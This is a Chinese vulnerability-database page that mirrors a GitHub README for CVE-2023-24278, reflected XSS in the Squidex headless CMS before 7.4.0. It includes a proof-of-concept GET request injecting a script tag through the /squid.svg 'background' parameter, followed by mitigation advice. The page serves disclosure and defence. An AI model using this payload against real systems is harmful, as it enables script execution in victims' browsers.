漏洞平台

POC详情： 5713e2122f5e32da053c58c05ed6a06a60a07a69

来源

https://github.com/NeCr00/CVE-2023-24278_XSS-in-Squidex

关联漏洞

标题： squidex 跨站脚本漏洞 (CVE-2023-24278)
描述：squidex是一款 Headless CMS 和内容管理中心。 squidex 7.4.0之前版本存在安全漏洞。攻击者利用该漏洞执行跨站脚本攻击。

描述

It was  discovered two reflected cross site scripting (XSS) vulnerabilities in the Squidex open source headless CMS software. The Reflected Cross Site Scripting vulnerabilities affect all versions of Squidex prior to 7.4.0 and affect both authenticated and unauthenticated victim users.

介绍

# CVE-2023-24278 - Reflected XSS Vulnerabilities in Squidex

## Overview
**CVE ID:** [CVE-2023-24278](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24278)  
**Affected Products:** Squidex versions prior to 7.4.0  
**Reported By:** Ioannis Christodoulakos  

This repository provides information and an exploit for two Reflected Cross-Site Scripting (XSS) vulnerabilities discovered in the Squidex open-source headless CMS software. These vulnerabilities affect all versions prior to 7.4.0 and enable attackers to execute malicious JavaScript code in victim browsers by embedding code into specific query parameters of the `/squid.svg` endpoint.

## Vulnerability Details
The vulnerabilities exist due to improper sanitization of user-supplied input in the `text` and `background` parameters of the `/squid.svg` endpoint. Malicious input passed to these parameters is embedded directly into an auto-generated SVG image, which is then reflected back to the user's browser. This allows attackers to inject and execute arbitrary JavaScript code.

## Exploit CVE-2023-24278
Below is a proof-of-concept (PoC) exploit demonstrating how the vulnerability can be exploited via the `background` parameter.

### Exploit Steps
1. Send the following malicious GET requests to the vulnerable endpoint:

   **Exploiting `background` Parameter:**
   ```http
   GET /squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cimg%20src=%22&small HTTP/2
   ```

2. The server will respond with an SVG image containing the injected JavaScript code.

3. When the victim clicks on the malicious link, the JavaScript code will execute in their browser.

---

## Mitigation
To address this issue:
1. **Upgrade to Squidex 7.4.0 or newer.**
2. Validate and sanitize all user-supplied input before embedding it into dynamically generated SVG files.

For more details, refer to the [official advisory](https://census-labs.com/news/2023/03/16/reflected-xss-vulnerabilities-in-squidex-squidsvg-endpoint/).

文件快照


 [4.0K]  /data/pocs/5713e2122f5e32da053c58c05ed6a06a60a07a69
└── [2.0K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。